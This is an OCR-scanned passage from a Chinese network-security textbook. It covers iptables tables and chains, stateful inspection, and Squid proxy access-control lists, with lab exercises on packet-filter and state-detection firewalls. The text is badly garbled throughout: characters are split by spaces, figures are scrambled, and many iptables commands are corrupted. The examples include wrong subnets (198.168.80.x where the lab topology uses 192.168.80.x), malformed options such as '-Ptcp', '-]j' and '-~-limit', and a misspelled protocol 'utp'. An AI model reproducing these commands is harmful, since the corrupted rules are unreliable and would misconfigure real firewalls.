iptables 开发 结构 : iptables 命令 实现 对 filter、nat 及 mangle 3 个 表 及 以 后 扩展 的 表 模 
块 进行 处 理 。 该 命令 支持 插件 来 实现 新 的 匹配 参数 和 目标 动作 。 它 有 两 个 实现 : iptables 
(IPv4) 及 iptables(IPv6), 两 者 都 基于 相同 的 库 和 基本 上 相同 的 代码 。 一 个 iptables 命令 基 
本 上 包含 5 部 分 : 希望 工作 在 哪个 表 上 ;希望 使 用 该 表 的 哪个 链 ; 进 行 的 操作 (插入 、 添 加 、 
删除 、 修 改 ) ;对 特定 规则 的 目标 动作 ;匹配 资料 包 条 件 。 基 本 的 语法 为 
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表 链 规则 


INPUT 户 - 匹配 目标 
( filter | FORWARD 户 - 匹配 目标 
OUTPUT 一 匹配 目标 
PREROUTING ”万 一 匹配 目标 

] 厂 二 = 二 
iptables nat -| OUTPUT 一 匹配 目标 

) se do he sms 
POSTROUTING ”一 匹配 目标 
PREROUTING 户 匹配 目标 

-站 mangle 上 ES 
OUTPUT 一 匹配 目标 

扩展 表 


图 3-2 iptables 结构 图 


iptables -t table -Operation chain -j target match (es) 


其 中 基本 操作 (Operation) 如 下 : 


-A 在 链 尾 添加 一 条 规则 。 

-I 插入 规则 。 

-D 删除 规则 。 

-有 替代 一 条 规则 。 

-L 列 出 规则 。 

基本 目标 动作 (target) ,适用 于 所 有 的 链 : 
ACCEPT 接收 该 数据 报 。 

DROP 丢弃 该 数据 报 。 

QUEUE 将 该 数据 报 加 入 用 户 空 间 队 列 。 
RETURN 返回 到 前 面 调用 的 链 。 


iptables 命令 是 对 防火 墙 配 置 管理 的 核心 命令 ,提供 了 丰富 的 功能 ,可 以 对 Linux 内 核 
中 的 netfilter 防火 墙 进行 各 种 策略 的 设置 。iptables 命令 的 设置 在 系统 中 是 即时 生效 的 , 因 
而 ,手工 进行 的 防火 墙 策略 设置 如 果 不 进行 保存 ,将 在 系统 下 次 启动 时 丢失 。 
iptables-save 命令 提供 了 防火 墙 配置 的 保存 功能 ,如 果 需 要 将 iptables-save 命令 的 输 
出 保存 起 来 ,需要 将 命令 输出 结果 重 定向 到 指定 的 文件 中 ,其 命令 是 


iptables- save > 指定 的 文件 名 


iptables 脚本 的 save 命令 可 以 保存 防火 墙 配 置 ,命令 如 下 : 


service iptables save 


配置 内 容 将 保存 在 /etc/ sysconfig/iptables 文件 中 ,文件 原 有 的 内 容 将 被 覆盖 。 
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真正 执行 这 些 过 滤 规 则 的 是 netfilter(Linux 核心 中 的 一 个 通用 架构 ) 及 其 相关 模块 (如 
iptables 模块 和 nat 模块 )。 在 两 个 网 络 接口 间 转 发 分 组 , 按 图 3-3 所 示 顺 序 接受 规则 链 
检查 。 


输入 输出 
路 由 决策 FORWORD OUTGOING 
PREROUTING POSTROUTING 
Local 


Process 


图 3-3 ”状态 分 析 图 


PREROUTING 链 : 对 分 组 进行 目的 网 络 地 址 转换 (DNAT) 和 mangle 处 理 。 同 时 
iptables 重新 分 组 。 

FORWARD 链 : 把 分 组 的 状态 和 过 滤 表 中 的 规则 进行 匹配 。 

POSTROUTING 链 : 对 分 组 进行 源 网 络 地 址 转换 (SHAT) ,利用 嗅 探 器 对 TCP 连接 、 
UDP 连接 ICMP 进行 状态 分 析 。 

在 传统 的 包 过 滤 防 火 墙 的 基础 上 基于 Linux 平台 实现 状态 防火 墙 的 功能 。 这 种 防火 墙 
具有 非常 好 的 安全 特性 , 它 会 在 自身 的 cache 或 内 存 中 维护 一 个 动态 的 状态 表 。 数 据 包 到 
达 时 ,对 该 数据 包 的 处 理 方式 将 综合 访问 规则 和 数据 包 所 处 的 状态 进行 。 具 体 来 说 , 它 采 用 
了 一 个 在 网 关上 执行 网 络 安全 策略 的 软件 引擎 , 称 为 检测 模块 。 检 测 模块 在 不 影响 网 络 正 
常 工作 的 前 提 下 ,采用 抽取 相关 数据 的 方法 对 网 络 通 信 的 各 层 实 施 监测 。 抽 取 部 分 数据 , 即 
状态 信息 ,并 动态 地 保存 起 来 作为 以 后 制定 安全 决策 的 参考 。 检 测 模块 支持 多 种 协议 和 应 
上 程序 ,并 可 以 很 容易 地 实现 应 用 和 服务 的 扩充 。 与 其 他 安全 方案 不 同 , 当 用 户 访问 到 达 网 
关 的 操作 系统 前 ,状态 监视 器 要 抽取 有 关 数 据 进行 分 析 , 结 合 网 络 配置 和 安全 规定 作出 接 
纳 、 拒 绝 , 鉴 定 或 给 该 通信 加 密 等 决定 。 一 旦 某 个 访问 违反 安全 规定 ,安全 报警 器 就 会 拒绝 
该 访问 ,并 进行 记录 ,向 系统 管理 器 报告 网 络 状态 。 

实验 3-1 Linux 包 过 滤 防 火 墙 配置 实验 

【实验 目的 】 

(1) 理解 iptables 的 工作 机 理 。 

(2) 熟练 掌握 iptables 包 过 滤 命 令 及 规则 。 

【实验 拓扑 】 

实验 网 络 拓扑 如 图 3-4 所 示 ,为 了 将 内 部 网 段 192. 168. 80. 0/24 与 Internet 隔离 ,在 内 
网 和 Internet 之 间 使 用 了 包 过 滤 防 火 墙 。 另外 ,内 网 中 有 3 台 服 务 器 对 外 提供 服务 ,其 IP 
地 址 如 图 3-4 所 示 。 

【实验 要 求 】 

(1) 利用 iptables 建立 基于 包 过 滤 的 防火 墙 ,实现 内 /外 网 对 WWW 服务 器 、FTP 服务 
器 、E-mail 服务 器 的 双向 访问 。 

(2) 建立 针对 内 网 客户 的 过 滤 规 则 。 

(3) 能 防御 针对 包 过 滤 防 火 墙 的 攻击 ,例如 小 碎片 攻击 ,ping of death 等 。 
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内 网 
> 
WWW 
192.168.80.251 ethl 
192.168.80.254 
明 | 
FTP 和 
192.168.80.252 日 一 人 0 
198.199.37.254 
E-mail 
192.168.80.253 
图 3-4 实验 网 络 拓扑 
【实验 过 程 】 
(1) 实验 准备 。 


@ 实验 需要 安装 Nmap、Apache 和 Vsftpd。 后 两 个 软件 安装 后 ,根据 实际 情况 决定 是 
否 对 配置 文件 apache2. conf ,vsftpd. conf 和 allowed_users. conf 进行 修改 。FTP 还 要 新 建 
用 户 并 设置 密码 。 

搭建 E-mail 可 使 用 Sendmail 或 Postfix。Ubuntu 下 Postfix 的 安装 命令 为 sudo apt- 
get install postfix。 此 外 还 需 配 置 、 修 改 相关 文件 。 

@ 验证 能 否 正常 访问 WWW FTP、E-mail, 如 不 能 访问 ,需要 了 予以 解决 。 

@ 策略 分 析 。 建 立 防火 墙 的 主要 目的 是 对 内 部 的 各 种 服务 器 提供 保护 ,一 般 是 先 将 防 
火 墙 的 策略 设置 为 最 严格 监控 ,此 后 根据 需要 逐步 放宽 管理 。 

首先 设置 防火 墙 FORWARD 链 的 策略 DROP : 


iptables - P FORWARD DROP 


设置 关于 服务 器 的 包 过 滤 规 则 。 由 于 服务 器 和 客户 机 交互 是 双向 的 ,所 以 需要 考虑 双 
向 规则 设置 。 

(2) 建立 针对 来 自 Internet 数据 包 的 过 滤 规 则 。 

@@ WWW 服务 。 服 务 器 端口 80, 采 用 TCP 或 UTP 协议 ,规则 为 eth0 王 之 允许 目的 为 
内 网 WWW 服务 器 的 包 : 


iptables -A FORWARD -Ptcp -d198.168.80.251 -- dport www -i eth0 -j ACCEPT 


@ FTP 服务 。 服 务 器 命令 端 为 21 ,数据 端口 为 20,FTP 采 用 TCP 协议 ,规则 为 eth0 王 过 
允许 目的 为 内 部 FTP 服务 器 的 包 : 

iptables -A FORWARD -P tcp -d 198.168.80.252 - -dport ftp -i eth0 -j ACCEPT 

@ E-mail 服务 器 。E-mail 涉及 SMTP 和 POP3 两 个 协议 。 出 于 安全 性 考虑 ,通常 只 
提供 对 内 的 POP3 服务 。 所 以 在 此 只 考虑 针对 SMTP 的 安全 性 问题 。SMTP 端口 25 .采用 


TCP 协议 ,规则 为 eth0 二 二 允许 目的 为 内 部 网 E-mail 服务 器 的 SMTP 请 求 : 
»。 104 。 


iptables -A FORWARD -P tcp -d198.168.80.253 - dport smtp -i eth0 -]j ACCEPT 

(3) 建立 针对 内 网 客户 的 过 滤 规 则 。 

由 于 防火 墙 位 于 网 关 的 位 置 ,所 以 主要 是 防止 来 自 Internet 的 攻击 ,不 能 防止 来 自 内 网 
的 攻击 。 假 如 网 络 中 的 服务 器 都 是 基于 Linux 的 ,也 可 以 在 每 一 台 服 务 器 上 设置 相关 的 过 
滤 规 则 来 防止 来 自 内 网 的 攻击 。 对 于 Internet 对 内 网 客户 的 返回 包 , 定 义 如 下 规则 。 
@ 允许 内 网 客户 采用 被 动 模式 访问 Internet 的 FTP 服务 器 : 


iptables -A FORWARD -p tcp -s 0/0 - sport ftp-data -d 198.168.80.0/24 -i eth0 
-j ACCEPT 


@ 接受 来 自 Internet 的 非 连 接 请 求 的 TCP 包 : 
iptables -A FORWARD -P tcp -d 198.168.80.0/24 ! - syn -i eth0 -j ACCEPT 


@ 接受 所 有 UDP 包 , 主 要 针对 OICQ 等 使 用 UDP 的 服务 : 


iptables -A FORWARD -p utp -d 198.168.80.0/24 -i eth0 -j ACCEPT 
(4) 接受 来 自 整 个 内 网 的 数据 包 过 滤 , 定 义 规则 如 下 : 
iptables -A FORWARD -s 198.168.80.0/24 -i eth0 -j ACCEPT 


@ 处 理 IP 碎片 。 接 受 所 有 的 IP 碎片 ,但 采用 limit 匹配 扩展 对 其 单位 时 间 可 以 通过 
的 了 P 碎片 数量 进行 限制 ,以 防止 IP 碎片 攻击 : 


iptables -A FORWARD -f -mlimit --1Limit 100/s - -1limit -burst 100 -j ACCEPT 


@ 小 碎片 攻击 , 即 利用 IP 分 片 功能 把 TCP 头 部 切 分 到 不 同 的 分 片 中 。 其 防御 对 策 
是 : 丢弃 分 片 太 小 的 分 片 。 这 样 ,不 管 来 自 哪里 的 IP 碎片 都 进行 限制 ,允许 每 秒 通过 
100 个 IP 碎片 ,该 限制 触发 的 条 件 是 100 个 卫 碎片 。 

@@ 设置 ICMP 包 过 滤 。ICMP 包 通 常用 于 网 络 连通 性 测试 等 ,所 以 允许 所 有 的 ICMP 
包 通 过 。 但 是 黑客 常常 采用 ICMP 进行 攻击 ,如 ping of death 等 ,所 以 采用 limit 匹配 扩展 
加 以 限制 : 


iptables -A FORWARD -P icmp -mlimit -~-limit 1/s -~-limit -burst 100 -j ACCEPT 


这 样 , 对 不 管 来 自 哪 里 的 ICMP 包 都 进行 限制 ,允许 每 秒 通 过 一 个 包 给 限制 触发 的 条 件 
是 100 个 包 。 

【实验 验证 】 

完成 上 述 设 置 后 ,进行 实验 验证 。 

(1) 用 Nmap 扫描 建立 的 防火 墙 ,防火 墙 上 共 对 外 开放 哪些 端口 ?与 规则 一 致 吗 ? 

(2) 按 实验 要 求 设计 验证 场景 ,检验 是 否 达 到 防护 要 求 。 验 证 时 启动 包 捕获 软件 
Wireshark ,分 析 数 据 包 的 动向 。 

3.3.2.2 状态 检测 防火 墙 的 应 用 
图 3-5 是 一 个 屏蔽 子 网 的 防火 墙 系统 ,用 来 实现 局 域 网 的 安全 建设 。 其 内 外 部 的 路 由 
器 可 以 用 Linux 系统 代替 ,可 随时 修改 其 软件 内 核 ,增加 系统 的 灵活 性 。 
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3-5 屏蔽 子 网 防火 墙 系统 


堡垒 主机 (bastion host) 由 一 台 计 算 机 担当 ,其 作用 就 是 对 进出 的 数据 包 进 行 审核 , 它 
是 为 进入 内 部 网 络 设置 的 一 个 检查 点 ,达到 把 整个 内 部 网 络 的 安全 问题 集中 在 某 个 主机 上 
解决 的 目的 。 堡 又 主机 是 网 络 中 最 容易 受到 侵害 的 主机 ,所 以 堡垒 主机 必须 是 自身 保护 最 
完善 的 主机 。 同 时 它 可 以 安装 入侵 检 测 系统 ,与 防火 墙 相 结合 ,检测 出 网 络 中 的 异常 行为 
(如 对 防火 墙 等 的 攻击 ) 后 ,可 以 对 防火 墙 的 规则 进行 动态 修改 ,更 好 地 保证 网 络 的 安全 ,这 
也 是 目前 网 络 安全 的 发 展 趋势 之 一 。 

DMZ(Demilitarized Zone, 非 军事 区 或 者 停火 区 ) 是 位 于 内 部 网 络 和 外 部 网 络 之 间 的 小 
区 域 ,是 为 内 网 放置 一 些 必须 公开 的 服务 器 设施 而 设置 的 ,通常 放置 DNS、Web、 E-mail、 
FTP、Proxy Server 等 服务 器 。 同 时 ,通过 DMZ, 更 加 有 效 地 保护 了 内 部 网 络 ,这 种 网 络 部 
署 比 一 般 的 防火 墙 方案 又 多 了 一 道 关 卡 。 

外 部 路 由 器 只 允许 对 DMZ 的 访问 ,拒绝 所 有 以 内 部 网 络 地 址 为 源 地 址 的 包 进 入 内 部 
网 络 。 拒 绝 所 有 不 以 内 部 网 络 地 址 为 源 地 址 的 包 离开 网 络 。 

内 部 路 由 器 保护 内 部 网 络 ,防止 来 自 Internet 或 DMZ 的 访问 。 内 部 网 络 一 般 不 对 外 
部 提供 服务 ,拒绝 外 部 发 起 的 一 切 连 接 , 只 允许 内 部 对 外 的 访问 。 

状态 检测 防火 墙 结合 了 包 过 滤 防 火 墙 和 应 用 级 网 点 防火 墙 的 优点 ,对 数据 流 实行 自动 
状态 检测 分 析 , 有 效 地 保证 了 网 络 安全 。 实 践 表 明 , 状 态 检测 防火 墙 的 处 理 速度 快 ,安全 
性 高 。 

实验 3-2 Linux 防火 墙 状态 检测 实验 

【实验 目的 】 

(1) 理解 iptables 的 工作 机 理 。 

(2) 熟练 掌握 iptables 状态 检测 命令 及 规则 。 

【实验 原理 】 

状态 检测 防火 墙 采用 了 状态 检测 包 过 滤 的 技术 ,是 传统 包 过 滤 上 的 功能 扩展 。 状 态 检 
测 防火 墙 在 网 络 层 有 一 个 检查 引擎 ,截获 数据 包 并 抽取 出 与 应 用 层 状态 有 关 的 信息 ,并 以 此 
为 依据 决定 对 该 连接 是 接受 还 是 拒绝 。 这 种 技术 提供 了 高 度 安全 的 解决 方案 ,同时 具有 和 较 
好 的 适应 性 和 扩展 性 。 状 态 检测 防火 墙 一 般 也 包括 一 些 代理 级 的 服务 ,它们 提供 附加 的 对 
特定 应 用 程序 数据 内 容 的 支持 。 状 态 检 测 技术 最 适合 提供 对 UDP 协议 的 有 限 支持 。 它 将 
所 有 通过 防火 墙 的 UDP 分 组 均 视 为 一 个 虚 连 接 , 当 反 向 应 答 分 组 送 达 时 ,就 认为 一 个 虚拟 
连接 已 经 建立 。 状 态 检测 防火 墙 克 服 了 包 过 滤 防 火 墙 和 应 用 代理 服务 器 的 局 限 性 ,不 仅仅 
检测 to 和 from 的 地 址 ,而且 不 要 求 每 个 访问 的 应 用 都 有 代理 。 

。 106 ，。 


此 技术 能 对 网 络 通信 的 各 层 实行 检测 。 同 包 过 滤 技 术 一 样 , 它 能 够 检测 通过 的 IP 地 
址 、 端 口号 以 及 TCP 标记 ,过 滤 进 出 的 数据 包 。 

状态 检测 防火 墙 基本 保持 了 简单 包 过 滤 防 火 墙 的 优点 , 据 奔 了 简单 包 过 滤 防 火 墙 仅仅 
考察 进出 网 络 的 数据 包 ,不 关心 数据 包 状 态 的 缺点 ,在 防火 墙 的 核心 部 分 建立 状态 连接 表 ， 
维护 了 连接 ,将 进出 网 络 的 数据 当成 一 个 个 的 事件 来 处 理 。 

iptables 就 是 一 种 基于 状态 的 防火 墙 。 命 令 格 式 如 下 : 


iptables -m state -- state [!] state [,state, state, state] 


iptables 中 的 状态 检测 功能 是 由 state 选项 来 实现 的 。state 模块 能 够 跟踪 分 组 的 连接 
状态 ( 即 状态 检测 )。state 是 一 个 用 逗号 分 隔 的 列表 ,表示 要 匹配 的 连接 状态 。 状 态 表 能 够 
保存 的 最 大 连接 数 取 决 于 硬件 的 物理 内 存 。 状 态 分 为 4 种 : 

(1) NEW: 该 包 要 求 建立 一 个 新 的 连接 (重新 连接 或 连接 重 定向 ) 。 

(2) RELATED: 该 包 是 属于 某 个 已 经 建立 的 连接 所 建立 的 新 连接 。 例 如 ,FTP 的 数 
据 传输 连接 和 控制 连接 之 间 就 是 RELATED 关系 。 

(3) ESTABLISHED: 该 包 属 于 某 个 已 经 建立 的 连接 。 

(4) INVALID: 该 包 不 匹配 于 任何 连接 ,通常 这 些 包 被 禁止 DROP) 。 

【实验 拓扑 】 

两 台 互 连 互通 的 Linux 主机 为 一 组 ,如 图 3-6 所 示 。 

主机 1 的 JIP 为 ( ) 。 


主机 2 的 I 为 ( 3 
【实验 内 容 】 局 
(1) 两 台 主 机 为 一 组 ,分 别 对 新 建 和 已 建 的 网 “主机 1 
络 会 话 进行 状态 检测 。 与 


(2) 实验 时 启动 数据 包 捕 获 工具 (如 六 
Wireshark) ,深入 分 析 数 据 流 ,特别 注意 会 话 时 的 图 3-6 实验 拓扑 

(3) 给 出 主要 操作 的 截图 。 

【实验 步骤 】 

Q@ 创建 用 户 /口令 (例如 : test/testpass) ,以 便 从 主机 1 上 通过 telnet 登录 主机 2。 

验证 : 主机 1 能 否 telnet 主机 2? 

@ 建立 FTP( 安 装 vsftpd 服务 ) ;建立 用 户 和 登录 目录 。 

验证 : 主机 1 能 否 ftp 主机 2? 

@ 建立 Web 服务 器 (安装 apache 服务 器 ) 。 

验证 : 主机 1 能 否 访 问 主机 2 的 Web 服务 器 ? 

目的 : 应 确保 上 述 3 种 连接 都 能 成 功 。 

(1) 对 新 建 的 网 络 会 话 进行 状态 检测 。 

Q@ 清空 filter 规则 链 的 全 部 内 容 。iptables 命令 : 


iptables -下 
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@ 设置 全 部 链表 默认 规则 为 允许 。iptables 命令 : 


iptables -P INPUT ACCEPT 
iptables - P FORWARD ACCEPT 
iptables -P OUTPUT ACCEPT 


@ 设置 规则 禁止 任何 新 建 连接 通过 。iptables 命令 : 
iptables -A INPUT -m state - state NEW -]j DROP 


@ 主机 1 对 主机 2 防火 墙 规则 进行 测试 ,验证 规则 正确 性 。 根 据 测 试用 例 写 出 测试 用 
例 ,并 配合 抓 包 分 析 主 机 2 防火 墙 的 动作 。 

测试 用 例 1: 主机 1 telnet 主机 2 ,结果 : ( 入 

测试 用 例 2: 主机 1 ftp 主机 2, 结 果 : ( ) 。 

测试 用 例 3: 主机 1 访问 主机 2 Web 服务 器 ,结果 : ( ) 。 

防火 墙 规则 设置 结论 : ( ”)。 

(2) 对 已 建 的 网 络 会 话 进行 状态 检测 。 

@ 清空 filter 规则 链 的 全 部 内 容 , 并 设置 默认 规则 为 允许 。 

@ 主机 1 telnet 远程 登录 主机 2, 当 出 现 “login: ”界面 时 ,暂停 登录 操作 。telnet 登录 
命令 : 

telnet 主机 2 的 IP 地 址 

@ iptables 添加 新 规则 (状态 检测 ) : 仅 禁 止 新 建 网 络 会 话 请 求 。iptables 命令 : 

iptables -A INPUT -m state -~ state NEW - j DROP 
或 

iptables -I INPUT -m state -- state NEW - j DROP 


主机 1 继续 执行 步骤 @ 进 行 登录 操作 ,尝试 输入 登录 用 户 名 (test) 及 口令 (testpass), 登 
录 是 否 成 功 ? 配合 抓 包 分 析 主 机 2 防火 墙 的 动作 。 

主机 1 启动 Web 浏览 器 访问 主机 2 的 Web 服务 ,访问 是 否 成 功 ? 配合 抓 包 分 析 主 机 2 
防火 墙 的 动作 。 

解释 上 述 现象 。 

@ 删除 步骤 加 中 添加 的 规则 。iptables 命令 : 


iptables -D INPUT -m state -~ state NEW - j DROP 


iptables -D INPUT 1 


@@ 主机 1 重新 telnet 远程 登录 主机 2, 当 出 现 “login:" 界 面 时 ,暂停 登录 操作 。 
@ iptables 添加 新 规则 (状态 检测 ) : 仅 禁 止 已 建 网 络 会 话 请 求 。iptables 命令 : 


iptables -A INPUT -m state -~ state ESTABLISHED ~j DROP 
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iptables -I INPUT -m state -~ state ESTABLISHED -]j DROP 

主机 1 继续 执行 步骤 @ 进 行 登录 操作 ,登录 是 否 成 功 ? 配合 抓 包 分 析 主 机 2 防火 墙 的 
动作 。 

主机 1 启动 Web 浏览 器 访问 主机 2 的 Web 服务 ,访问 是 否 成 功 ? 配合 抓 包 分 析 主 机 2 
防火 墙 的 动作 。 

解释 上 述 现象 。 

@ 当前 主机 再 次 清空 filter 链表 规则 ,并 设置 默认 策略 为 DROP, 添 加 规则 开放 FTP 
服务 ,并 允许 远程 用 户 上 传 文件 至 FTP 服务 器 。iptables 命令 : 


iptables -A INPUT -Ptcp -- dport 21 -j ACCEPT 

iptables -A INPUT -m state - -~ state ESTABLISHED, RELATED -]j ACCEPT 
iptables -A OUTPUT -P tcp -- sport 21 -j ACCEPT 

iptables -A OUTPUT -m state - - state ESTABLISHED ~ j ACCEPT 


验证 规则 设置 后 是 否 能 上 传 文件 ?配合 抓 包 分 析 主 机 2 防火 墙 的 动作 。 

【实验 思考 】 

在 上 述 实 验 时 ,特别 注意 对 先前 从 防火 墙 发 出 去 的 包 的 回复 ,防火 墙 如 何 处 理 ? 有 没有 
检查 规则 ? 


3.3.3 应 用 代理 技术 


代理 技术 是 最 常用 的 防火 墙 技 术 之 一 ,通过 对 防火 墙 代理 服务 的 配置 可 以 使 局 域 网 内 
部 的 主机 通过 一 台 代理 服务 器 访问 外 网 ,也 可 以 使 外 网 对 内 网 的 访问 受到 防火 墙 的 限制 。 
安装 了 代理 软件 的 主机 即 为 应 用 型 防火 墙 主机 。 

代理 服务 器 是 介 于 浏览 器 和 Web 服务 器 之 间 的 服务 器 。 有 了 该 服务 器 之 后 ,浏览 器 发 
出 的 信息 会 先 送 到 代理 服务 器 ,由 代理 服务 器 取 回 网 页 内 容 并 传送 给 客户 的 浏览 器 。 对 企 
业 网 络 而 言 ,代理 服务 器 可 以 起 到 控制 网 络 访问 并 屏蔽 不 安全 信息 以 及 网 络 加 速 的 目的 。 

Squid 是 Linux 下 缓存 Internet 数据 的 代理 服务 器 软件 ,是 一 个 应 用 层 代 理 服务 器 ,能 
和 iptables 配合 建立 透明 代理 服务 器 。 

Squid 接收 用 户 的 下 载 申 请 并 自动 处 理 所 下 载 的 数据 。 当 用 户 要 下 载 一 个 主页 时 ,向 
Squid 发 出 一 个 申请 ,让 Squid 代替 其 进行 下 载 。 然 后 Squid 连接 所 申请 的 网 站 并 请 求 该 主 
页 ,接着 把 该 主页 传 给 用 户 , 同 时 保留 一 个 备份 。 当 别 的 用 户 申 请 同样 的 页 面 时 ,Squid 把 
保存 的 备份 传 给 用 户 ,使 用 户 觉得 速度 相当 快 。 这 个 过 程 大 致 如 下 (图 3-7): 

OO 客户 端 向 代理 服务 器 发 送 Web 访问 请 求 。 

@ 代理 服务 器 接收 到 请 求 后 ,首先 判断 是 否 满足 访问 控制 表 的 规则 。 如 果 满 足 , 则 在 
缓存 中 查找 是 否 有 客户 端 所 需要 的 信息 。 

G 如 果 缓 存 有 客户 端 需要 的 信息 , 则 将 信息 传送 给 代理 服务 器 。 

@ 如 果 没 有 ,代理 服务 器 就 代替 客户 端 向 Internet 请 求 指定 的 信息 。 

@ Internet 上 的 主机 将 代理 服务 器 的 请 求 信息 发 送 到 代理 服务 器 中 ,同时 代理 服务 器 
会 将 信息 存 人 缓存 中 。 

@@ 代理 服务 器 将 Internet 上 的 回应 信息 传送 给 客户 端 。 
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图 3-7 代理 服务 流程 图 


Squid 可 以 代理 HTTP、FTP、Gopher、SSL 和 WAIS 等 协议 ,并 且 Squid 可 以 自动 地 进 
行 处 理 ,通过 访问 控制 特性 来 灵活 地 控制 用 户 访 问 时 间 、 站 点 等 限制 ,根据 需要 过 滤 数 据 包 。 

在 使 用 过 程 中 ,合理 使 用 访问 控制 是 非常 重要 的 工作 。 使 用 访问 控制 特性 ,可 以 控制 其 
在 访问 时 根据 特定 的 时 间 间 隔 进行 缓存 .访问 特定 站 点 或 一 组 站 点 等 等 。Squid 访问 控制 
有 两 个 要 素 : ACL 元 素 和 访问 列表 。 访 问 列表 可 以 允许 或 拒绝 某 些 用 户 对 此 服务 的 访问 。 

ACL 元 素 是 Squid 访问 控制 的 基础 ,其 基本 语法 为 

acl name type valuel … 

acl name type "file"… 
其 中 ,name 为 ACL 元 素 的 名 字 . 在 书写 访问 控制 列表 时 需要 引用 它们 ;type 可 以 是 任 一 在 
ACL 中 定义 的 类 型 ;每 个 ACL 元 素 可 以 有 多 个 值 , 当 进行 匹配 检测 的 时 候 , 多 个 值 由 逻辑 
或 运算 连接 , 即 任 一 ACL 元 素 的 任 一 值 被 匹配 , 则 这 个 ACL 元 素 即 被 匹配 。 

例如 : 

acl http_ports Port 80 8000 8080 
以 上 命令 可 以 匹配 80、8000、8080 三 个 端口 中 的 任意 一 个 。 

acl clients src 192.168. 0. 0/24 10. 0.1. 0/24 
以 上 命令 使 用 子 网 192. 168. 0.0 和 10. 0. 1.0。 

acl guests src "/etc/squid/guest" 

不 同类 型 的 ACL 元 素 写 在 不 同行 中 。 当 一 个 ACL 元 素 的 值 较 多 ,不 方便 全 部 列 出 的 
时 候 ,可 以 使 用 文件 为 ACL 元 素 指定 值 ,该 文件 的 格式 为 每 行 包含 一 个 条 目 。 

ACL 的 类 型 较 多 ,有 src、dstdomain、port,time 等 类 型 。 

ACL 元 素 是 建立 访问 控制 的 第 一 步 。 第 二 步 是 访问 控制 列表 ,用 来 允许 或 拒绝 某 些 
动作 。 

访问 控制 列表 的 语法 如 下 : 

access_list allowldeny [!] aclname ... 


例如 : 
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http access allow MyClients 
http access deny ! Safe Ports 


Squid 有 大 量 访问 控制 列表 ,其 中 http_access 是 最 重要 也 最 常用 的 访问 控制 列表 , 它 决 
定 哪些 客户 的 HTTP 请 求 被 允许 或 哪些 被 拒绝 。 当 读 取 配置 文件 时 ,Squid 只 扫描 一 遍 访 
问 控制 行 , 因 此 访问 列表 规则 的 顺序 也 非常 重要 .而 且 规 则 总 是 遵循 由 上 而 下 的 顺序 。 根 据 
访问 控制 列表 允许 或 禁止 某 一 类 用 户 访 问 ,如 果 最 后 一 条 为 允许 , 则 默认 就 是 禁止 。 通 常 应 
该 把 最 后 的 条 目 设 为 deny all 或 allow all 来 避免 安全 隐患 。 

访问 控制 列表 的 规则 按照 它们 的 排列 顺序 进行 匹配 检测 ,一 旦 检测 到 匹配 的 规则 ,匹配 
检测 就 立即 结束 。 访 问 列表 可 以 由 多 条 规则 组 成 ,如 果 没 有 任何 规则 与 访问 请 求 匹配 ,默认 
动作 将 与 列表 中 最 后 一 条 规则 对 应 。 一 个 访问 条 目 中 的 所 有 元 素 将 用 逻辑 与 运算 连接 ,多 
个 http_access 声明 间 用 或 运算 连接 。 

例如 : 


http access Action 声明 1 AND 声明 2 OR http access Action 声明 3 


下 面 给 出 使 用 这 些 访问 控制 方法 的 实例 。 

(1) 允许 列表 中 的 机 器 访问 Internet。 

假设 规则 : 只 允许 IP 地 址 为 192. 168. 0.10、192. 168. 0. 20 及 192. 168.0. 30 的 机 器 访 
问 Internet, 除 此 之 外 的 客户 机 将 拒绝 访问 本 地 代理 服务 器 。 规 则 如 下 : 


acl allowed clients src 192.168.0.10 192.168.0.20 192.168.0.30 
http access allow allowed clients 


http access deny !allowed clients 


(2) 限制 访问 时 段 。 
假设 规则 : 允许 子 网 192. 168. 0. 1 中 的 所 有 客户 机 在 周一 到 周 五 的 上 午 10:00 到 下 午 
4:00 访问 Internet。 规 则 如 下 : 


acl allowed clients src 192.168.0.1/255.255.255.0 
acl regular days time MTWHF 10:00- 16:00 
http access allow allowed clients regular days 


http access deny !allowed clients 

(3) 屏蔽 合 有 某 些 特定 字 词 的 网 站 。 

假设 规则 : 使 用 正则 表达 式 ,拒绝 客户 机 通过 代理 服务 器 访问 包含 诸如 sexy 等 关键 字 
的 网 站 。 规 则 如 下 : 


acl deny url url_regex -i sexy 


http access deny deny_ url 


(4) 禁止 网 段 10~50 上 网 。 规 则 如 下 : 


acl client src 172.16.1.10- 172.16.1.50/32 
http access deny client 


Squid 服务 器 的 主 配置 文件 squid. conf 保存 在 /etc/squid 目录 中 ,其 提供 代理 服务 的 默 
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认 端 口 是 3128。 

Squid 代理 服务 器 访问 控制 策略 功能 丰富 ,ACL 类 型 和 访问 控制 列表 众多 ,在 实际 应 用 
中 可 根据 不 同 需求 灵活 进行 配置 。 

实验 3-3 ”代理 防火 墙 应 用 实验 

【实验 目的 】 

(1) 理解 代理 防火 墙 的 技术 原理 。 

(2) 熟练 掌握 Squid 的 安装 配置 .ACL 命令 及 规则 。 

【实验 原理 】 

代理 防火 墙 技 术 是 在 网 关 计 算 机 上 运行 应 用 代理 程序 ,运行 时 由 两 部 分 连接 构成 : 一 
部 分 是 应 用 网 关 同 内 部 网 用 户 计 算 机 建立 的 连接 , 另 一 部 分 是 代替 原来 的 客户 程序 与 服务 
器 建立 的 连接 。 通 过 代理 服务 ,内 部 网 用 户 可 以 通过 应 用 网 关 安 全 地 使 用 Internet 服务 ,而 
对 于 非法 用 户 的 请 求 将 予 拒绝 。 代 理 服务 技术 与 包 过 滤 技 术 的 不 同 之 处 在 于 内 部 网 和 外 部 
网 之 间 不 存在 直接 连接 ,同时 提供 审计 和 日 志 服务 。 

在 Linux 环境 下 ,一 般 采 用 netfilter/iptables 构筑 防火 墙 ,代理 采用 Squid。Squid 是 一 
种 在 Linux 系统 下 使 用 的 优秀 的 代理 服务 器 软件 。Squid 是 一 个 缓存 Internet 数据 的 一 个 
软件 , 它 接收 用 户 的 下 载 申 请 ,并 自动 处 理 所 下 载 的 数据 。 也 就 是 说 , 当 一 个 用 户 要 下 载 一 
个 主页 时 , 它 向 Squid 发 出 一 个 申请 ,要 Squid 替 它 下 载 ; 然 后 Squid 连接 所 申请 的 网 站 并 请 
求 该 主页 ,接着 把 该 主页 传 给 用 户 , 同 时 保留 一 个 备份 , 当 别 的 用 户 申 请 同样 的 页 面 时 ， 
Squid 把 保存 的 备份 立即 传 给 用 户 ,因而 速度 较 快 。 

对 于 Web 用 户 来 说 , Squid 是 一 个 高 性 能 的 代理 缓存 服务 器 ,可 以 加 快 内 部 网 浏览 
